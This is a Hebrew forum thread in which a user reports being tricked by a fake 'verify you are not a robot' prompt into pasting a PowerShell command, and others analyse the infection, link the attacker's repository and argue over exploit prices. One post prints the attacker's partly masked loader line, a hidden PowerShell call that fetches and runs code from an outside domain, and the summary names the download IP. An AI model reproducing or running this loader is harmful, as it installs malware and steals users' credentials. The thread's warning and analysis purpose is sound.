שיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר
-
קשור למישהו כאן לא יכול להיות צירוף מקרים...
-
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...
62e1986e-5a9e-4fd3-92c2-02e285959232-צילום מסך.zipהאתר שבו זה קפץ (בלי אחריות - הוספתי כוכביות כדי שלא תלחצו בטעות על הקישור!!
https://www.bslonline*****.co.il/vip/פרסמו כמה שיותר!!!!
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
-
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...
62e1986e-5a9e-4fd3-92c2-02e285959232-צילום מסך.zipהאתר שבו זה קפץ (בלי אחריות - הוספתי כוכביות כדי שלא תלחצו בטעות על הקישור!!
https://www.bslonline*****.co.il/vip/פרסמו כמה שיותר!!!!
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
@בנימין-מחשבים לא נראה לי אני יעבור על כול זה
אבל הנה הגיטהאב של התוקף/איפה שמאוחסן הוירוס (או יותר נכון השלב הבא שלו) למי שמעוניין
https://github.com/paper-skydiver-drv8 -
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...
62e1986e-5a9e-4fd3-92c2-02e285959232-צילום מסך.zipהאתר שבו זה קפץ (בלי אחריות - הוספתי כוכביות כדי שלא תלחצו בטעות על הקישור!!
https://www.bslonline*****.co.il/vip/פרסמו כמה שיותר!!!!
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
@בנימין-מחשבים כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...אני שמח שהפוסטים כאן עזרו ליהודי.
מחר אני יהיה על המחשב הנגוע. נדווח על כל צעד חריג... -
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...
62e1986e-5a9e-4fd3-92c2-02e285959232-צילום מסך.zipהאתר שבו זה קפץ (בלי אחריות - הוספתי כוכביות כדי שלא תלחצו בטעות על הקישור!!
https://www.bslonline*****.co.il/vip/פרסמו כמה שיותר!!!!
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
@בנימין-מחשבים אחד החמודים היוצר של זה אפי' השאיר הערות הסבר על הקוד
# Making temporary changes that will revert later # Partial implementation below, non-blocking # Waiting for service heartbeat before continuing # Retry logic removed (no longer needed) SyncAppvPublishingServer.vbs "n;saps $env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\?owershell.??? -Arg '-NoP -C & (gal i*************************************************************************************************************?*********************x)(& (gcm *************************************************************************************************************************estM*****************************************************) docker-void.mesh-api-cloud-secure.in.net/fedora-win11);while(1){sleep 60}' -Wi Hidden" # Only used in fallback scenarios # Handles backend sync issue on older hosts # Last-minute fix - unverified but consistent # Watching for inconsistencies in runtime behavior while ($false) { $assembly = [System.Reflection.Assembly]::LoadWithPartialName("System.Xml"); Write-Debug "Loaded Assembly FullName: $($assembly.FullName)" } (Get-Culture).Name | Out-Null -
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...
62e1986e-5a9e-4fd3-92c2-02e285959232-צילום מסך.zipהאתר שבו זה קפץ (בלי אחריות - הוספתי כוכביות כדי שלא תלחצו בטעות על הקישור!!
https://www.bslonline*****.co.il/vip/פרסמו כמה שיותר!!!!
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
@בנימין-מחשבים כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
האתר ביקש ממנו לבצע:
Win + R → Ctrl + V → Enter, מה שלכאורה פתח חלון Run והדביק פקודה שהייתה ב‑clipboard שלו.
סתם ללחוץ cntl v מה הבעיה?גמ"ח עזרה וייעוץ בנושאי מחשבים
-
@בנימין-מחשבים כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
האתר ביקש ממנו לבצע:
Win + R → Ctrl + V → Enter, מה שלכאורה פתח חלון Run והדביק פקודה שהייתה ב‑clipboard שלו.
סתם ללחוץ cntl v מה הבעיה?@pcinfogmach אתה צודק, אבל תמיד אם אתר מבקש ממך את זה אז כנראה הוא תוקף...
עדיף לכתוב את זה כך כדי שאנשים יזכרו את זה (אנשים לא יודעים בכלל מה זה Win + R)
Ctrl + V = וירוס -
@pcinfogmach אתה צודק, אבל תמיד אם אתר מבקש ממך את זה אז כנראה הוא תוקף...
עדיף לכתוב את זה כך כדי שאנשים יזכרו את זה (אנשים לא יודעים בכלל מה זה Win + R)
Ctrl + V = וירוס@בנימין-מחשבים
שומע
אבל קצת מוזר לאסור את הקיצור מקשים הזה....
אולי ככה:
cntrl + v = זהירות משנה מוירוס -
טעות שלי, המחירים הרבה פחות יקרים, תראו לדוגמא כאן
https://socradar.io/blog/insights-from-socradars-annual-dark-web-report-2024/
וכאן
https://moneyzine.com/resources/dark-web-statistics/@עידו300 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
טעות שלי, המחירים הרבה פחות יקרים, תראו לדוגמא כאן
https://socradar.io/blog/insights-from-socradars-annual-dark-web-report-2024/
וכאן
https://moneyzine.com/resources/dark-web-statistics/מה זה האתרים האלה בכלל?
בכל מקרה אי אפשר להשוות סתם CVE ל CVE שמאפשר לברוח מארגז חול של דפדפן ולהצפין קבצים במחשבמה שכן חשוב מאוד לעדכן קבוע את הדפדפן
-
עכשיו ראיתי שפרסם עוד מישהו שכמעט נפל בזה
ורק בגלל שפורסם הנושא הוא ידע לא ללחוץ על זה...
62e1986e-5a9e-4fd3-92c2-02e285959232-צילום מסך.zipהאתר שבו זה קפץ (בלי אחריות - הוספתי כוכביות כדי שלא תלחצו בטעות על הקישור!!
https://www.bslonline*****.co.il/vip/פרסמו כמה שיותר!!!!
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
@בנימין-מחשבים כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
שאנשים ידעו לעולם לא ללחוץ קונטרול+וי באתרים! נראה שהנגע הזה פושה במהירות בעוד ועוד אתרים לגטימיים-לכאורה
אין בעיה ללחוץ קונטרול V, הבעיה ללחוץ WIN+R
@בנימין-מחשבים כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
אנשים לא יודעים בכלל מה זה Win + R
אז צריך לשנן לאנשים לא ללחוץ על צירופי מקשים שהם לא מכירים
או יותר נכון להבין את הגבולות שבין הדפדפן למחשב
כי מחר יגידו להם להוריד קובץ ומחרתיים להריץ משהו בקונסול -
@עידו300 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
טעות שלי, המחירים הרבה פחות יקרים, תראו לדוגמא כאן
https://socradar.io/blog/insights-from-socradars-annual-dark-web-report-2024/
וכאן
https://moneyzine.com/resources/dark-web-statistics/מה זה האתרים האלה בכלל?
בכל מקרה אי אפשר להשוות סתם CVE ל CVE שמאפשר לברוח מארגז חול של דפדפן ולהצפין קבצים במחשבמה שכן חשוב מאוד לעדכן קבוע את הדפדפן
@צדיק-תמים כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
מה זה האתרים האלה בכלל?
לא יודע, אני רק יודע שהם פרסמו מחירי נוזקות, ובפוסטים אחרים שלהם הם העלו צילומי מסך מהדרקנט כך שסביר שזה נכון...
@צדיק-תמים כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
בכל מקרה אי אפשר להשוות סתם CVE ל CVE שמאפשר לברוח מארגז חול של דפדפן ולהצפין קבצים במחשב
נו באמת מוכרים שם נוזקות שלמות במחירים מגוחכים, משכירים רשת בוטנטים בגרושים, cve שימכר במיליונים זה חריג ביותר.
ואגב, רק מעצמה תקנה במיליונים. כי כלכלי - זה לא.
היום גם הכופרות לא מניבות הרבה רווחים, יש הרבה מודעות לא לשלם להם (לפחות אחרי שנחשפים אליהם יש מודעות...) ויש הרבה גיבויים, ויש הרבה שלא מעניין אותם עד כדי כך החומר שיש על המחשב... נכון שהיו חברות ששילמו כופר של רבע מיליון, אבל להשקיע מיליונים רק על חולשה של escape והסלמת הרשאות עוד לפני כל שאר ההוצאות של בניית נוזקה (הרי יש עוד חלקים חשובים חוץ מהבריחה) והפצתה וכל זה בשביל הימור שאולי ישלמו 300 דולר על הקבצים שסביר להניח שלא יחזרו... קלוש.
וכבר השתמשו בכאלו חולשותמה שכן חשוב מאוד לעדכן קבוע את הדפדפן
אין ספק, מסכים עם כל מילה
-
@בנימין-מחשבים לא נראה לי אני יעבור על כול זה
אבל הנה הגיטהאב של התוקף/איפה שמאוחסן הוירוס (או יותר נכון השלב הבא שלו) למי שמעוניין
https://github.com/paper-skydiver-drv8 -
@צדיק-תמים כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
מה זה האתרים האלה בכלל?
לא יודע, אני רק יודע שהם פרסמו מחירי נוזקות, ובפוסטים אחרים שלהם הם העלו צילומי מסך מהדרקנט כך שסביר שזה נכון...
@צדיק-תמים כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
בכל מקרה אי אפשר להשוות סתם CVE ל CVE שמאפשר לברוח מארגז חול של דפדפן ולהצפין קבצים במחשב
נו באמת מוכרים שם נוזקות שלמות במחירים מגוחכים, משכירים רשת בוטנטים בגרושים, cve שימכר במיליונים זה חריג ביותר.
ואגב, רק מעצמה תקנה במיליונים. כי כלכלי - זה לא.
היום גם הכופרות לא מניבות הרבה רווחים, יש הרבה מודעות לא לשלם להם (לפחות אחרי שנחשפים אליהם יש מודעות...) ויש הרבה גיבויים, ויש הרבה שלא מעניין אותם עד כדי כך החומר שיש על המחשב... נכון שהיו חברות ששילמו כופר של רבע מיליון, אבל להשקיע מיליונים רק על חולשה של escape והסלמת הרשאות עוד לפני כל שאר ההוצאות של בניית נוזקה (הרי יש עוד חלקים חשובים חוץ מהבריחה) והפצתה וכל זה בשביל הימור שאולי ישלמו 300 דולר על הקבצים שסביר להניח שלא יחזרו... קלוש.
וכבר השתמשו בכאלו חולשותמה שכן חשוב מאוד לעדכן קבוע את הדפדפן
אין ספק, מסכים עם כל מילה
@עידו300 סתם ציטוט מתוך ראיון בdarknetdiaries
NICOLE: They were never going to pay the rates that governments and brokers were going to be offering for these tools, right? Like, the going rate for a zero-day exploit that gets you into an iPhone’s IOS software remotely is $2.5 million, although I found one broker in researching the book called Crowdfense that now offers even more than that; they offered $3 million for that same capability, so we’re getting out-priced these days by other countries.או בעברית
ניקול: "הם אף פעם לא עמדו לשלם את המחירים שממשלות ומתווכים הציעו עבור הכלים האלה, נכון? למשל, המחיר המקובל עבור פרצת 'יום אפס' (zero-day) שמאפשרת חדירה מרחוק למערכת ה-iOS של האייפון הוא 2.5 מיליון דולר, למרות שבזמן המחקר לספר מצאתי מתווך אחד בשם Crowdfense שמציע עכשיו אפילו יותר מזה; הם הציעו 3 מיליון דולר עבור אותה יכולת, כך שבימים אלה מדינות אחרות דוחקות אותנו החוצה מהשוק בגלל המחירים הגבוהים."
שם מדברים על למה חברות כמו אפל לא מצליחות להתחרות בשוק הפרטי וזו אחת הסיבות
לשאלתך כן עבור מדינות רבות זה כמו לקנות נשק לכול דבר ועניין
פרצות סייבר יכולות להיות כלים חזקים מאוד (עין ערך הפרצה ברכבי חברת jeep שהובילה לשליטה מרחוק על רכבים ול"תאונות" מכוונות)תחשוב על ה מה עדיף לך טיל כיפת ברזל במחיר של כמה מיליונים או וירוס מתוחכם רב פעמי?
ברור שבשביל ה300$ אף אחד לא ישקיע למרות שגם זה מצטבר אבל זה פשוט נשק סודי שאתה קונה כפשוטו. -
@עידו300 סתם ציטוט מתוך ראיון בdarknetdiaries
NICOLE: They were never going to pay the rates that governments and brokers were going to be offering for these tools, right? Like, the going rate for a zero-day exploit that gets you into an iPhone’s IOS software remotely is $2.5 million, although I found one broker in researching the book called Crowdfense that now offers even more than that; they offered $3 million for that same capability, so we’re getting out-priced these days by other countries.או בעברית
ניקול: "הם אף פעם לא עמדו לשלם את המחירים שממשלות ומתווכים הציעו עבור הכלים האלה, נכון? למשל, המחיר המקובל עבור פרצת 'יום אפס' (zero-day) שמאפשרת חדירה מרחוק למערכת ה-iOS של האייפון הוא 2.5 מיליון דולר, למרות שבזמן המחקר לספר מצאתי מתווך אחד בשם Crowdfense שמציע עכשיו אפילו יותר מזה; הם הציעו 3 מיליון דולר עבור אותה יכולת, כך שבימים אלה מדינות אחרות דוחקות אותנו החוצה מהשוק בגלל המחירים הגבוהים."
שם מדברים על למה חברות כמו אפל לא מצליחות להתחרות בשוק הפרטי וזו אחת הסיבות
לשאלתך כן עבור מדינות רבות זה כמו לקנות נשק לכול דבר ועניין
פרצות סייבר יכולות להיות כלים חזקים מאוד (עין ערך הפרצה ברכבי חברת jeep שהובילה לשליטה מרחוק על רכבים ול"תאונות" מכוונות)תחשוב על ה מה עדיף לך טיל כיפת ברזל במחיר של כמה מיליונים או וירוס מתוחכם רב פעמי?
ברור שבשביל ה300$ אף אחד לא ישקיע למרות שגם זה מצטבר אבל זה פשוט נשק סודי שאתה קונה כפשוטו.@cfopuser אין ספק שמעצמות יקנו בכאלו מחירים, זה גם מה שכתבתי, אבל לא בשביל בריחה מסנדבוקס...
ואתה מסכים איתי של 0-day של הפצת נוזקה על מחשב מרוחק עם 0-click מצד בעל המחשב (הדבר היחיד שצריך - לפחות לפי מה שמתועד - הוא שיהיה מערכת הפעלה של אפל, זה מטורף, זה שווה יותר ממליונים..) שווה פי כמה וכמה מבריחה מארגז חול? זה הרבה הרבה רמות מעל כל שאר הוירוסים. וזה בהחלט שווה את הסכום, שב2018 היה חצי מהסכום שהוזכר שם...
ואם כבר, אני לא מצליח להכנס לאתר שכתבת, אבל ממקום אחר שהזכירו את המחירון שלהם אז יש את הציטוט הבא:$500,000 for remote code-execution exploits in Chrome including a sandbox escape (previously $250,000 and $200,000 for Windows and Android respectively)
והבא
$80,000 for Windows local privilege escalation or sandbox escape (previously $50,000)
שים לב לפער המחירים...
וזה היה ב2019... המידע שהבאתי, יותר עדכני ולא סגור לחברה אחת...
-
@cfopuser אין ספק שמעצמות יקנו בכאלו מחירים, זה גם מה שכתבתי, אבל לא בשביל בריחה מסנדבוקס...
ואתה מסכים איתי של 0-day של הפצת נוזקה על מחשב מרוחק עם 0-click מצד בעל המחשב (הדבר היחיד שצריך - לפחות לפי מה שמתועד - הוא שיהיה מערכת הפעלה של אפל, זה מטורף, זה שווה יותר ממליונים..) שווה פי כמה וכמה מבריחה מארגז חול? זה הרבה הרבה רמות מעל כל שאר הוירוסים. וזה בהחלט שווה את הסכום, שב2018 היה חצי מהסכום שהוזכר שם...
ואם כבר, אני לא מצליח להכנס לאתר שכתבת, אבל ממקום אחר שהזכירו את המחירון שלהם אז יש את הציטוט הבא:$500,000 for remote code-execution exploits in Chrome including a sandbox escape (previously $250,000 and $200,000 for Windows and Android respectively)
והבא
$80,000 for Windows local privilege escalation or sandbox escape (previously $50,000)
שים לב לפער המחירים...
וזה היה ב2019... המידע שהבאתי, יותר עדכני ולא סגור לחברה אחת...
@עידו300 בריחה מסאנדבוקס משמעותו אתה לוחץ על לינק ובאותו רגע יש rce והמחשב שלך נשלט ברור שיש רמות בזה
ותאמין לי שלא כול אתר שני באינטרנט יודע בדיוק איך הדילים נסגרים ומספרים וכו'
אני דיברתי מתוך דברים ששמעתי מכמה מקורות שהם לדעתי מוסמכים מכאן והלאה זה פשוט יהיה הלוך ושוב של מי מביא יותר ציטטוים מגוגל אז צר לי אני לא רוצה לקחת בזה חלק.
מגוגל אתה יכול להוכיח שקרחים (🧊) זה מילה תקנית...אז נסכים שלא להסכים בסדר
-
@בנימין-מחשבים לא נראה לי אני יעבור על כול זה
אבל הנה הגיטהאב של התוקף/איפה שמאוחסן הוירוס (או יותר נכון השלב הבא שלו) למי שמעוניין
https://github.com/paper-skydiver-drv8 -
@cfopuser מצאתי שם רק מחרוזת base64 שמפענחת את עצמה שוב ושוב ושוב, לא הגעתי לסוף... זה מה שמצאת? פחדתי להוריד את זה למחשב גם רק בתור קובץ txt... למרות שזה לא אמור לרוץ אם אין מה שיריץ אותו, ואני לא מתכוון להריץ אותו...
@עידו300 בתכלס כן יש base64 שמפענחת את עצמה שוב ושוב ל utf - 16LE
ותוך כדי שי בדיקות על המחשב שהקוד רץ בו לבדוק שהוא רגיל ולא מוגן בסוף אנחנו מגיעים לקוד הסופי שרץ בסביבבת דוקר מתוך איזה דומיין שהוא קנה מאיזה חברת קש.הקוד שמוריד מהדומיין מאוד חמוד יש הערות בפנים והכול מפורט פשש.
וזה הכנה לקוד שבדומיין שמה יש אין סוף חישובים מתמטים סתם כדי לערפל את הקוד,
בעיקרון באתי להריץ את זה במכונה וירטואלית ולעצור אותו בסוף ולחלץ מה קורה בסוף אבל עצרתי שם. -
@עידו300 בתכלס כן יש base64 שמפענחת את עצמה שוב ושוב ל utf - 16LE
ותוך כדי שי בדיקות על המחשב שהקוד רץ בו לבדוק שהוא רגיל ולא מוגן בסוף אנחנו מגיעים לקוד הסופי שרץ בסביבבת דוקר מתוך איזה דומיין שהוא קנה מאיזה חברת קש.הקוד שמוריד מהדומיין מאוד חמוד יש הערות בפנים והכול מפורט פשש.
וזה הכנה לקוד שבדומיין שמה יש אין סוף חישובים מתמטים סתם כדי לערפל את הקוד,
בעיקרון באתי להריץ את זה במכונה וירטואלית ולעצור אותו בסוף ולחלץ מה קורה בסוף אבל עצרתי שם.@cfopuser אז לפותח השרשור אפשר להגיד כמעט בוודאות שככל הנראה התוכן על המחשב לא יוצפן לו, אבל סביר להניח שכל סיסמא שהיתה לו אי פעם על המחשב חייבת שינוי דחוף? (זה שאלה, כן?)
אבל זה מוזר שגנב מידע יבקש כופר? אולי הסוואה? או עוד משהו על הדרך?
אגב, אתה נשמע מאוד בתחום, אולי יעניין אותך.
ואולי המלצה, להכניס איפה שהוירוס בודק את המחרוזת שמעדכנת שזו מכונה וירטואלית, זה יחסוך הרבה וירוסים, אפשר גם להתקין ג'ידרה וכאלו כלים.
-
אתמול נתבקשתי על ידי אתר שקפץ לי בתור פרסומת, "לאמת שאני לא רובוט
".
רק שזה היה נראה בדיקה שונה, כך זה היה: להקיש לחצן התחל+R, ואז קונטרול+V, ואז אנטר.
את כל "האימות" הזה עשיתי במהירות, כך שלא חשבתי מה זה יכול לחולל.
מיד אחרי השלבים האלה נפתח חלון של PowerShell שהריצה פקודה קצרה ונסגרה ,
מיד נפתח חלון על כל המסך הודעה משטרת ישראל על עבירות חוק מהמחשב, ואמור להנעל המחשב לצמיתות, או תשלום כופר ע"ס: ₪1,100.
אף פעם לא חשבתי שתוכנות כופר יגיעו אלי, עד שהייתי צריך להשבית את כל האנטי וירוס כדי להתקין משהו, ובדיוק בזמן הזה זה קורא.
תחכימו תלמדו ותזהרו!נתתי לai את הפקודה שהדבקתי בחלונית ההתחל שפתחתי, וזה טוען שלקחו ממני כתובת ip, וכנראה סיסמאות
עריכה (לאחר 246 פוסטים שנכתבו בעניין הזה) כדי לקצר תהליכים למי שרוצה סיכום:
|-סיכום/הערכת מצב
פקודת PowerShell שהורצההפקודה שהועתקה כללה שימוש ב-PowerShell כדי להוריד קובץ טקסט (“clo.txt”) מ-IP חיצוני (84.21.189.170), ואז להריץ אותו עם פרמטרים מוסווים.
חלק מהטקסט שהטמיעו לקורבן כדי שידביק (“I am not a bot – Verification ID…”) נועד להטעות משתמשים כך שיחשבו שזה אימות "אני לא רובוט" אמיתי.
️ הסבר על וירוס כופר מסוג Clopמה הווירוס עושה:
יכול לבצע הצפנת קבצים חשובים במערכת.
עלול לגנוב נתונים רגישים ולדרוש תשלום כופר.
יכול למחוק עותקי גיבוי ולמנוע שחזור עצמאי.
משאיר הוראות כופר (Ransom Note) עם כתובת לתשלום (בדרך כלל במטבע קריפטו).
עצות והצעות למי שכבר הפעיל את הוירוסהצעות להגנה/תגובה מיידית:
- כיבוי מיידי של המחשב כדי לנסות לעצור המשך פעילות של הקוד.
- או ניתוק האינטרנט כדי למנוע הורדה נוספת או דיווח למפעילים.
- שינוי סיסמאות.
- מחיקת פרופיל דפדפן שבו הופיעה ההודעה.
- שחזור מידע דרך דיסקים טכנאים.
לגביי אנטי וירוס - אם עוזר במצבים כאלה? עדיין אן תשובה חד משמעית מהמשתמשים כאן. מכיון שייתכן והוירוס מסווה את עצמו גם מפני האנטי וירוס ועוקף אותו...
ולמי שרוצה לדעת איך להיזהר ולהגן על המחשב מפני וירוסים כאלה.
"להקדים רפואה למכה"
- אף פעם לא לבצע פעולות טכניות במחשב, מאתר שאומר לך מה לעשות (כדוגמת Win+R | Ctrl+V Enter). (@מתכנת-חובב).
- אנטי וירוס פעיל כל הזמן, מספיק לדברים כאלה לפחות את המובנה של ווינדוס.
- חסימת PowerShell (צעד מתקדם אבל חכם. הצעת AI)
צריך להגדיר שההרשאה לתוכנה זו - היא רק למנהל, ולא למשתמש רגיל. (לא יודע איך מגדירים). - כדאי להשתמש במנהל סיסמאות אמין במקום סיסמאות בדפדפן. (לדוגמה KeepassXC). (@מישהו12).
תודה לקב"ה - שאם נתקפתם בווירוס - זה היה על המחשב ולא בגופכם.
שימו 🤍 - השתדלתי לסכם מהפוסטים שכתבו כאן בשרשור (הקרדיט כולו שלכם, כתבו לי כדי להוסיף קרדיט אם צריך). זה לא מידע שלי. ייתכן ויש טעויות.
 { const baseUrl = "https://www.google.co.il/search?q=site:mitmachim.top"; const m = location.pathname.match(/^\/(topic|category)\/(\d+)/); const type = m ? m[1] : null; const id = m ? m[2] : null; let searchInput; function search(path = "") { const query = searchInput.value.trim(); if (query) { window.open(`${baseUrl}${path}%20${encodeURIComponent(query)}`, "_blank"); } } let buttons = {}; buttons.searchAll = { id: "bb-search-all", label: `חיפוש ${type ? "בכל הפורום" : ""}`, className: type ? "btn-secondary" : "btn-primary", callback: () => search(), }; if (type === "topic") { buttons.searchTopic = { label: "חיפוש בנושא זה", className: "btn-primary", callback: () => search(`/topic/${id}`), }; } else if (type === "category") { buttons.searchCategory = { label: "חיפוש בקטגוריה זו", className: "btn-primary", callback: () => search(`/category/${id}`), }; } buttons.cancel = { label: "ביטול", className: "btn-default", "data-bs-dismiss": "modal" }; const dialog = bootbox.dialog({ title: '<div style="text-align:center;"><img src="/assets/uploads/files/1625950269825-mt-google.png" width="400" alt="חיפוש בגוגל"></div>', message: '<input id="bb-inp" class="bootbox-input bootbox-input-text form-control" placeholder="הקלידו כדי לחפש בגוגל" autocomplete="off"/>', buttons, backdrop: true, show: true, onEscape: true }); dialog.on("shown.bs.modal", function () { searchInput = document.getElementById("bb-inp"); if (searchInput) { searchInput.focus(); searchInput.addEventListener("keydown", function (e) { if (e.key === "Enter") { e.preventDefault(); const query = this.value.trim(); if (query) { search(); dialog.modal("hide"); } } else if (e.key === "Escape") { e.preventDefault(); dialog.modal("hide"); } }); } const searchAllButton = document.getElementById("bb-search-all"); if (searchAllButton) { searchAllButton.title = "לחצו על אנטר כדי לחפש"; } }); })(); void 0;){kind=link}